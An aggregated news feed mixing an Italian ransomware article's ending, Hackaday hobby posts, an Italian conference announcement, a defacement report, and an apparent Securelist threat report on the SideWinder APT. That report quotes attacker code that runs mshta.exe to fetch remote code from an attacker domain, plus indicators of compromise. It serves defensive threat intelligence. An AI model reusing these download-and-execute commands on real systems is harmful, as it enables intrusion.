Sebbene sia ancora presto per valutarne l’impatto complessivo, Crazyhunter ha già dimostrato di poter colpire organizzazioni di alto profilo e di avere un modello operativo altamente strategico. La combinazione di exploit avanzati, crittografia sofisticata e tattiche di coercizione lo rende una minaccia emergente da non sottovalutare.

Per le aziende, la lezione è chiara: non basta proteggersi dal ransomware tradizionale. Le nuove generazioni di cybercriminali stanno affinando strategie sempre più distruttive e difficili da contrastare.

L'articolo Crazyhunter: il nuovo ransomware con il “Sistema di Annientamento Dati Tridimensionale” proviene da il blog della sicurezza informatica.

Science fiction authors and readers dream of travelling at the speed of light, but Einstien tells us we can’t. You might think that’s an arbitrary rule, but [FloatHeadPhysics] shows a different way to think about it. Based on a book he’s been reading, “Relativity Visualized,” he provides a graphic argument for relativity that you can see in the video below.

The argument starts off by explaining how a three-dimensional object might appear in a two-dimensional world. In this world, everything is climbing in the hidden height dimension at the exact same speed.

Our 2D friends, of course, can only see the shadow of the 3D object so if it is staying in one place on the table surface, the object never seems to move. However, just as we can measure time with a clock, the flat beings could devise a way to measure height. They would see that the object was moving “through height” at the fixed speed.

Now suppose the object turns a bit and is moving at, say, a 45 degree angle relative to the table top. Now the shadow moves and the “clock speed” measuring the height starts moving more slowly. If the object moves totally parallel to the surface, the shadow moves at the fixed speed and the clock speed shadow doesn’t move at all.

This neatly explains time dilation and length contraction. It also shows that the speed of light isn’t necessarily a rule. It is simply that everything in the observable universe is moving at the speed of light and how moving through space affects it.

Doesn’t make sense? Watch the video and it will. Pretty heady stuff. We love how passionate [FloatHeadPhysics] gets about the topic. If you prefer a funnier approach, turn to the BBC. Or, if you like the hands-on approach, build a cloud chamber and measure some muons.

youtube.com/embed/TJmgKdc7H34?…

hackaday.com/2025/03/10/you-ar…

Last year, we published an article about SideWinder, a highly prolific APT group whose primary targets have been military and government entities in Pakistan, Sri Lanka, China, and Nepal. In it, we described activities that had mostly happened in the first half of the year. We tried to draw attention to the group, which was aggressively extending its activities beyond their typical targets, infecting government entities, logistics companies and maritime infrastructures in South and Southeast Asia, the Middle East, and Africa. We also shared further information about SideWinder’s post-exploitation activities and described a new sophisticated implant designed specifically for espionage.

We continued to monitor the group throughout the rest of the year, observing intense activity that included updates to SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control compromised systems. The targeted sectors were consistent with those we had seen in the first part of 2024, but we noticed a new and significant increase in attacks against maritime infrastructures and logistics companies.

In 2024, we initially observed a significant number of attacks in Djibouti. Subsequently, the attackers shifted their focus to other entities in Asia and showed a strong interest in targets within Egypt.

Moreover, we observed other attacks that indicated a specific interest in nuclear power plants and nuclear energy in South Asia and further expansion of activities into new countries, especially in Africa.

Countries and territories targeted by SideWinder in the maritime and logistics sectors in 2024

It is worth noting that SideWinder constantly works to improve its toolsets, stay ahead of security software detections, extend persistence on compromised networks, and hide its presence on infected systems. Based on our observation of the group’s activities, we presume they are constantly monitoring detections of their toolset by security solutions. Once their tools are identified, they respond by generating a new and modified version of the malware, often in under five hours. If behavioral detections occur, SideWinder tries to change the techniques used to maintain persistence and load components. Additionally, they change the names and paths of their malicious files. Thus, monitoring and detection of the group’s activities reminds us of a ping-pong game.

Infection vectors

The infection pattern observed in the second part of 2024 is consistent with the one described in the previous article.

Infection flow

The attacker sends spear-phishing emails with a DOCX file attached. The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker. The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process that leads to the installation of malware we have named “Backdoor Loader”. This acts as a loader for “StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder.

The documents used various themes to deceive victims into believing they are legitimate.

Some documents concerned nuclear power plants and nuclear energy agencies.

Malicious documents related to nuclear power plants and energy

Many others concerned maritime infrastructures and various port authorities.

Malicious documents relating to maritime infrastructures and different port authorities

In general, the detected documents predominantly concerned governmental decisions or diplomatic issues. Most of the attacks were aimed at various national ministries and diplomatic entities.

We also detected various documents that covered generic topics. For example, we found a document with information on renting a car in Bulgaria, a document expressing an intent to buy a garage, and another document offering a freelance video game developer a job working on a 3D action-adventure game called “Galactic Odyssey”.

Examples of generic malicious documents

RTF exploit

The exploit file contained a shellcode, which had been updated by the attacker since our previous research, but the main goal remained the same: to run embedded JavaScript code invoking the
mshtml.RunHTMLApplication function.
In the new version, the embedded JavaScript runs the Windows utility
mshta.exe and obtains additional code from a remote server:javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe
dgtk.depo-govpk[.]com/19263687…);window.close();")
The newer version of the shellcode still uses certain tricks to avoid sandboxes and complicate analysis, although they differ slightly from those in past versions.

• It uses the GlobalMemoryStatusEx function to determine the size of RAM.
• It attempts to load the nlssorting.dll library and terminates execution if operation succeeds.

JavaScript loader

The RTF exploit led to the execution of the
mshta.exe Windows utility, abused to download a malicious HTA from a remote server controlled by the attacker.mshta.exe hxxps://dgtk.depo-govpk[.]com/19263687/trui
The remote HTA embeds a heavily obfuscated JavaScript file that loads further malware, the “Downloader Module”, into memory.

The JavaScript loader operates in two stages. The first stage begins execution by loading various strings, initially encoded with a substitution algorithm and stored as variables. It then checks the installed RAM and terminates if the total size is less than 950 MB. Otherwise, the previously decoded strings are used to load the second stage.

The second stage is another JavaScript file. It enumerates the subfolders at Windows%\Microsoft.NET\Framework\ to find the version of the .NET framework installed on the system and uses the resulting value to configure the environment variable
COMPLUS_Version.
Finally, the second stage decodes and loads the Downloader Module, which is embedded within its code as a base64-encoded .NET serialized stream.

Downloader Module

This component is a .NET library used to collect information about the installed security solution and download another component, the “Module Installer”. These components were already described in the previous article and will not be detailed again here.

In our latest investigation, we discovered a new version of the
app.dll Downloader Module, which includes a more sophisticated function for identifying installed security solutions.
In the previous version, the malware used a simple WMI query to obtain a list of installed products. The new version uses a different WMI, which collects the name of the antivirus and the related “productState”.

Furthermore, the malware compares all running process names against an embedded dictionary. The dictionary contains 137 unique process names associated with popular security solutions.
The WMI query is executed only when no Kaspersky processes are running on the system.

Backdoor Loader

The infection chain concludes with the installation of malware that we have named “Backdoor Loader”, a library consistently sideloaded using a legitimate and signed application. Its primary function is to load the “StealerBot” implant into memory. Both the “Backdoor Loader” and “StealerBot” were thoroughly described in our prior article, but the attacker has distributed numerous variants of the loader in recent months, whereas the implant has remained unchanged.

In the previous campaign, the “Backdoor Loader” library was designed to be loaded by two specific programs. For correct execution, it had to be stored on victims’ systems under one of the following names:
propsys.dll
vsstrace.dll
During the most recent campaign, the attackers tried to diversify the samples, generating many other variants distributed under the following names:
JetCfg.dll
policymanager.dll
winmm.dll
xmllite.dll
dcntel.dll
UxTheme.dll
The new malware variants feature an enhanced version of anti-analysis code and employ Control Flow Flattening more extensively to evade detection.

During the investigation, we found a new C++ version of the “Backdoor Loader” component. The malware logic is the same as that used in the .NET variants, but the C++ version differs from the .NET implants in that it lacks anti-analysis techniques. Furthermore, most of the samples were tailored to specific targets, as they were configured to load the second stage from a specific file path embedded in the code, which also included the user’s name. Example:
C:\Users\[REDACTED]\AppData\Roaming\valgrind\[REDACTED FILE NAME].[REDACTED EXTENSION]
It indicates that these variants were likely used after the infection phase and manually deployed by the attacker within the already compromised infrastructure, after validating the victim.

Victims

SideWinder continues to attack its usual targets, especially government, military, and diplomatic entities. The targeted sectors are consistent with those observed in the past, but it is worth mentioning that the number of attacks against the maritime and the logistics sectors has increased and expanded to Southeast Asia.

Furthermore, we observed attacks against entities associated with nuclear energy. The following industries were also affected: telecommunication, consulting, IT service companies, real estate agencies, and hotels.

Countries and territories targeted by SideWinder in 2024

Overall, the group has further extended its activities, especially in Africa. We detected attacks in Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri Lanka, the United Arab Emirates, and Vietnam.

In this latest wave of attacks, SideWinder also targeted diplomatic entities in Afghanistan, Algeria, Bulgaria, China, India, the Maldives, Rwanda, Saudi Arabia, Turkey, and Uganda.

Conclusion

SideWinder is a very active and persistent actor that is constantly evolving and improving its toolkits. Its basic infection method is the use of an old Microsoft Office vulnerability, CVE-2017-11882, which once again emphasizes the critical importance of installing security patches.

Despite the use of an old exploit, we should not underestimate this threat actor. In fact, SideWinder has already demonstrated its ability to compromise critical assets and high-profile entities, including those in the military and government. We know the group’s software development capabilities, which became evident when we observed how quickly they could deliver updated versions of their tools to evade detection, often within hours. Furthermore, we know that their toolset also includes advanced malware, like the sophisticated in-memory implant “StealerBot” described in our previous article. These capabilities make them a highly advanced and dangerous adversary.

To protect against such attacks, we strongly recommend maintaining a patch management process to apply security fixes (you can use solutions like Vulnerability Assessment and Patch Management and Kaspersky Vulnerability Data Feed) and using a comprehensive security solution that provides incident detection and response, as well as threat hunting. Our product line for businesses helps identify and prevent attacks of any complexity at an early stage. The campaign described in this article relies on spear-phishing emails as the initial attack vector, which highlights the importance of regular employee training and awareness programs for corporate security.

We will continue to monitor the activity of this group and to update heuristic and behavioral rules for effective detection of malware.

***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

Indicators of compromise

Microsoft Office Documents

e9726519487ba9e4e5589a8a5ec2f933
d36a67468d01c4cb789cd6794fb8bc70
313f9bbe6dac3edc09fe9ac081950673
bd8043127abe3f5cfa61bd2174f54c60
e0bce049c71bc81afe172cd30be4d2b7
872c2ddf6467b1220ee83dca0e118214
3d9961991e7ae6ad2bae09c475a1bce8
a694ccdb82b061c26c35f612d68ed1c2
f42ba43f7328cbc9ce85b2482809ff1c

Backdoor Loader

0216ffc6fb679bdf4ea6ee7051213c1e
433480f7d8642076a8b3793948da5efe

Domains and IPs

pmd-office[.]info
modpak[.]info
dirctt888[.]info
modpak-info[.]services
pmd-offc[.]info
dowmloade[.]org
dirctt888[.]com
portdedjibouti[.]live
mods[.]email
dowmload[.]co
downl0ad[.]org
d0wnlaod[.]com
d0wnlaod[.]org
dirctt88[.]info
directt88[.]com
file-dwnld[.]org
defencearmy[.]pro
document-viewer[.]info
aliyum[.]email
d0cumentview[.]info
debcon[.]live
document-viewer[.]live
documentviewer[.]info
ms-office[.]app
ms-office[.]pro
pncert[.]info
session-out[.]com
zeltech[.]live
ziptec[.]info
depo-govpk[.]com
crontec[.]site
mteron[.]info
mevron[.]tech
veorey[.]live
mod-kh[.]info

securelist.com/sidewinder-apt-…

If you’ve ever fancied building a ZX Spectrum clone without hunting down ancient ULAs or soldering your way through 60+ chips, [Alex J. Lowry] has just dropped an exciting build. He has recreated the Leningrad-1, a Soviet-built Spectrum clone from 1988, with a refreshingly low component count: 44 off-the-shelf ICs, as he wrote us. That’s less than many modern clones like the Superfo Harlequin, yet without resorting to programmable logic. All schematics, Gerbers, and KiCad files are open-source, listed at the bottom of [Alex]’ build log.

The original Leningrad-1 was designed by Sergey Zonov during the late Soviet era, when cloning Western tech was less about piracy and more about survival. Zonov’s design nailed a sweet spot between affordability and usability, with enough compatibility to run 90-95% of Spectrum software. [Alex]’ replica preserves that spirit, with a few 21st-century tweaks for builders: silkscreened component values, clever PCB stacking with nylon standoffs, and a DIY-friendly mechanical keyboard hack using transparent keycaps.

While Revision 0 still has some quirks – no SCART color output yet, occasional flickering borders with AY sound – [Alex] is planning for further improvements. Inspired to build your own? Read [Alex]’ full project log here.

hackaday.com/2025/03/10/zx-spe…

Mancano solo due mesi alla quarta edizione della Red Hot Cyber Conference 2025, l’evento annuale gratuito organizzato dalla community di Red Hot Cyber. La conferenza si terrà a Roma, come lo scorso anno presso il Teatro Italia in Via Bari 18, nelle giornate di giovedì 8 e venerdì 9 maggio 2025.

Questo appuntamento è diventato un punto di riferimento nel panorama italiano della sicurezza informatica, dell’intelligenza artificiale e dell’innovazione tecnologica, con l’obiettivo di sensibilizzare il pubblico sui rischi del digitale e promuovere la cultura della cybersecurity, soprattutto tra i più giovani.

La community di Red Hot Cyber, fondata nel 2019 da Massimiliano Brolli, si dedica alla diffusione di informazioni, notizie e ricerche su temi legati alla sicurezza informatica, all’intelligence e all’Information Technology. Con la convinzione che la condivisione della conoscenza e la collaborazione siano fondamentali per affrontare le sfide del cyberspazio, RHC si impegna attivamente nella promozione di una cultura della sicurezza, incoraggiando il pensiero critico e stimolando l’interesse per le discipline informatiche tra i giovani.

• Programma della Red Hot Cyber Conference 2025
• Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
• Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
• Regolamento per la Capture The Flag (CTF)

Accoglienza alla Red Hot Cyber Conference 2024

Una Prima Giornata Dedicata Esclusivamente Ai Giovani

Come ogni anno, la prima giornata della conferenza sarà interamente dedicata ai giovani, in particolare agli studenti delle scuole medie e superiori, per avvicinarli al mondo dell’information technology e della sicurezza informatica. A differenza degli scorsi anni, i Workshop saranno accessibili solo alla giornata di Giovedì 8 maggio.

I workshop hands-on – anche questo anno organizzati con il supporto di Accenture – saranno il cuore pulsante della giornata: prima spiegheremo ai ragazzi come si fa qualcosa, poi gli daremo la possibilità di rifarlo direttamente loro stessi sui loro laptop. Questo approccio pratico e interattivo è pensato per stimolare l’interesse verso il mondo della tecnologia e della cybersecurity e fornire un’opportunità unica di toccare con mano la tecnologia.
Il Cane SPOT della Boston Dynamics all’interno dei Workshop “hands-on” della Red Hot Cyber Conference 2024
Invitiamo i ragazzi delle scuole medie, superiori ed Università a registrarsi alla conferenza, affinché possano vivere un’esperienza formativa concreta e immersiva.

Ma la prima giornata non sarà solo formazione: anche quest’anno si terrà la Capture The Flag (CTF), una competizione per hacker etici provenienti da tutta Italia. I partecipanti si sfideranno in una serie di prove pratiche di cybersecurity, hacking etico e problem-solving, accumulando punteggi per scalare la classifica e vincere la challenge.

Una CTF è una competizione di cybersecurity in cui i partecipanti devono risolvere sfide di sicurezza informatica per trovare e “catturare” delle flag, ovvero dei codici nascosti all’interno di vari scenari digitali. La CTF di RHC si svolgerà in un ambiente sicuro e controllato, offrendo a giovani hacker l’opportunità di mettere alla prova le proprie capacità, imparare nuove tecniche e confrontarsi con altri appassionati del settore.

• Programma della Red Hot Cyber Conference 2025
• Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
• Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
• Regolamento per la Capture The Flag (CTF)

Capture The Flag (CTF) della Red Hot Cyber Conference 2024

Una Seconda Giornata All’Insegna Della Conferenza

Se la prima giornata sarà focalizzata sui giovani e sulla formazione pratica, la seconda giornata della Red Hot Cyber Conference 2025 sarà dedicata esclusivamente alla conferenza, con una serie di speech di alto livello interamente in lingua italiana.

Esperti di sicurezza informatica, information technology e innovazione digitale si alterneranno sul palco con interventi di eccezione, affrontando temi come l’hacking, l’intelligenza artificiale applicata alla cybersecurity, la sicurezza del cloud e delle infrastrutture critiche, le guerre informatiche, la geopolitica e le strategie di difesa digitale, oltre all’evoluzione del crimine informatico.
Panel alla Red Hot Cyber Conference 2024. Da Sinistra a destr: Dott. Mario Nobile Direttore Generale di AGID, l’agenzia per l’Italia digitale, Dott. Umberto Rosini, Direttore Sistemi Informativi alla Presidenza del Consiglio dei Ministri – Dipartimento della Protezione Civile, Dott. Paolo Galdieri: Avvocato penalista, Cassazionista, è Docente universitario di Diritto penale dell’informatica, Ing. David Cenciotti: Giornalista aerospaziale, ex ufficiale dell’AM, ingegnere informatico ed esperto di cybersecurity
La giornata si aprirà con un panel istituzionale di alto livello, in cui esperti giuridici, rappresentanti delle istituzioni e professionisti del settore discuteranno di strategie e normative per la protezione digitale del Paese. Il tema del panel sarà “IL FUTURO DELLA CYBERSICUREZZA IN ITALIA – STRATEGIE PER LA PROSSIMA ERA DIGITALE”, un dibattito cruciale su come l’Italia si sta preparando ad affrontare le nuove minacce cyber, con un focus su regolamentazione, prevenzione e strategie nazionali per rafforzare la sicurezza digitale.

La Red Hot Cyber Conference 2025 sarà un’occasione unica per confrontarsi con i maggiori esperti del settore, approfondire i temi più attuali della sicurezza informatica e comprendere come il nostro Paese può affrontare le sfide digitali del futuro.

• Programma della Red Hot Cyber Conference 2025
• Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
• Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
• Regolamento per la Capture The Flag (CTF)

Una inquadratura dei partecipanti alla Capture The Flag

Tutto Questo grazie Ai Nostri Sponsor

La realizzazione di questo evento non sarebbe possibile senza il prezioso supporto dei nostri sponsor. La loro collaborazione è fondamentale per offrire un’esperienza formativa e coinvolgente a tutti i partecipanti.

• Sponsor Sostenitori Workshop
  
  • Accenture Italia

  
  

• Sponsor Sostenitori
  
  • Fortinet
  • TrendMicro
  • Fata Informatica
  • Digital Value Cybersecurity
  • Enterprise
  • Akamai
  • Crowdstrike

  
  

• Sponsor Platinum
  
  • ITCentric
  • OPLIUM
  • Tinexta Cyber
  • Ermetix
  • S3K
  • Digimat

  
  

• Sponsor Gold
  
  • IAD
  • Olympos Consulting
  • CheckPoint technologies
  • Ancharia
  • Elmi
  • Utilia

  
  

• Sponsor Silver
  
  • Recorded Future
  • Delfi Security
  • Cyber Evolution
  • BraiIT

  
  

Inoltre ringraziamo tutti i nostri media Partner che sono i Fintech Awards, i Cyber Actors, Women 4 Cyber, Digital Security Summit, GDPR Day, E-Campus Università, Hackmageddon, CyberSecurityUP, Federazione Italiana Combattenti, Ri-Creazione, Aipsi e RedHotCyber Academy.

Invitiamo tutte le aziende interessate a sostenere la Red Hot Cyber Conference 2025 a contattarci per informazioni sui pacchetti di sponsorizzazione ancora disponibili. La vostra partecipazione contribuirà a promuovere la cultura della sicurezza informatica e a formare i professionisti del futuro.

• Programma della Red Hot Cyber Conference 2025
• Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
• Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
• Regolamento per la Capture The Flag (CTF)

Non perdete l’opportunità di essere parte di questo importante appuntamento nel mondo della cybersecurity!
Dei ragazzi riprendono il workshop “hands on” Ragazzi che stanno seguendo i workshop “hands-on”Francesco Conti, Luca Vinciguerra e Salvatore RIcciardi del gruppo AI di Red Hot Cyber presentano il workshop “COME CREARE UN SISTEMA DI FACE RECOGNITION CON LE AI” Andrea Tassotti di CyberSecurityUP presenta il workshop “COME HACKERARE UN ESEGUIBILE ELUDENDO CONTROLLI APPLICATIVI” Immagine dei Ragazzi che giocano alla Capture The Flag Immagine dei Ragazzi che giocano alla Capture The Flag Immagine dei Ragazzi che giocano alla Capture The Flag Una inquadratura dei partecipanti alla Capture The Flag Platea alla Red Hot Cyber Conference 2024 Ingresso di SPOT della Boston Dynamics alla Red Hot Cyber Conference 2024 Pranzo alla Red Hot Cyber Conference 2024 Una inquadratura dei partecipanti alla CTF sulla seconda scalinata del teatro Una foto dello STAFF Al completo della Red Hot Cyber Conference 2024

L'articolo Due mesi alla RHC Conference 2025! Grazie ai nostri Sponsor per aver reso questo evento possibile! proviene da il blog della sicurezza informatica.

Negli ultimi giorni, diversi siti web italiani sono stati presi di mira da un attacco di defacement, una tecnica utilizzata per modificare il contenuto di una pagina web senza il consenso del proprietario. Tra i siti colpiti figurano:

• hxxps://viralproduction[.]it/1337.php
• hxxps://diegolucattini[.]it/1337.php

Questi attacchi sono stati rivendicati dal gruppo denominato !FAKESITE, che ha lasciato la propria firma sulle pagine defacciate, accompagnata da un messaggio provocatorio e un elenco di pseudonimi di presunti membri del collettivo. Di seguito quanto gli hacktivisti hanno riportato all’interno dei siti:
FIRMATO DA FAKESITE | SISTEMA DI ERRORE INFORMATICO

"Se mi chiedi delle vulnerabilità di un sistema, non ho una risposta. Ma ciò che è certo è che la sicurezza più vulnerabile è quella degli esseri umani stessi"

CONTATTAMI CLICCA QUI

Fakesite - Doys_404 - Anon_lx02 - Fakesec - Iethesia - SukaKamu01 - HanjsXploite - Enter666x - NoFace999 - Lanzz/GregCyber - XybaXploite - RommyXploit - Dandier - Xstroven - BigBoy - Amirxploite - Machfood - Fedup_404 - UniCorn - Izunasec

[ Cyber Error System | Jawa Barat Cyber | TegalXploiter ]
[ Bogor6etar | Hacktivist Of Garuda ]

Cos’è un Deface?

Il defacing è una forma di hacking che consiste nell’alterare il contenuto di un sito web, sostituendo la homepage o aggiungendo elementi non autorizzati. Questo tipo di attacco può essere realizzato sfruttando vulnerabilità nei server web, nei CMS (Content Management System) o tramite credenziali compromesse.

I deface vengono spesso utilizzati per diversi scopi:

• Dimostrazione di vulnerabilità: per evidenziare falle nella sicurezza di un sistema.
• Messaggi politici o sociali: in casi di hacktivismo, gli attaccanti veicolano messaggi di protesta.
• Propaganda: alcuni gruppi utilizzano il defacing per diffondere ideologie o per fare pubblicità a determinate cause.
• Semplice vandalismo: in alcuni casi, gli attacchi avvengono senza uno scopo preciso, ma solo per il gusto di danneggiare.

Hacktivismo: Quando l’Hacking Diventa Protesta

L’hacktivismo è una forma di attivismo che sfrutta le tecniche informatiche per promuovere una causa politica o sociale. I gruppi hacktivisti spesso attaccano siti governativi, istituzionali o aziendali per sensibilizzare l’opinione pubblica su determinate problematiche. Alcuni dei gruppi più noti in questo campo sono Anonymous, Lizard Squad e LulzSec.

Nel caso del gruppo !FAKESITE il messaggio lasciato sui siti attaccati suggerisce un intento più legato al cyber-vandalismo o alla dimostrazione di competenze, piuttosto che a una vera e propria causa politica. Tuttavia, la presenza di riferimenti a una “Cyber Error System” e a collettivi come “Hacktivist Of Garuda” potrebbe suggerire un legame con movimenti più ampi della scena underground del hacking.

Implicazioni e Sicurezza

Attacchi di questo tipo evidenziano l’importanza di adottare misure di sicurezza adeguate per proteggere i siti web da intrusioni non autorizzate. Alcuni accorgimenti fondamentali includono:

• Aggiornare regolarmente software e plugin.
• Utilizzare password complesse e autenticazione a due fattori.
• Monitorare i log di accesso per individuare attività sospette.
• Implementare firewall e sistemi di rilevamento delle intrusioni.

Il defacing, sebbene possa sembrare un’azione innocua rispetto ad altri attacchi informatici più devastanti come il ransomware, può comunque causare danni reputazionali e finanziari significativi alle vittime.

Resta da vedere se il gruppo !FAKESITE continuerà con questo tipo di attacchi o se il loro operato si limiterà a questi episodi isolati. Nel frattempo, è essenziale che i gestori di siti web rafforzino le proprie difese per evitare di cadere vittime di simili incursioni.

Questo articolo è stato redatto attraverso l’utilizzo della piattaforma Recorded Future, partner strategico di Red Hot Cyber e leader nell’intelligence sulle minacce informatiche, che fornisce analisi avanzate per identificare e contrastare le attività malevole nel cyberspazio.

L'articolo Siti Italiani Presi di Mira! Il Deface di !FAKESITE e il Lato Oscuro dell’Hacktivismo proviene da il blog della sicurezza informatica.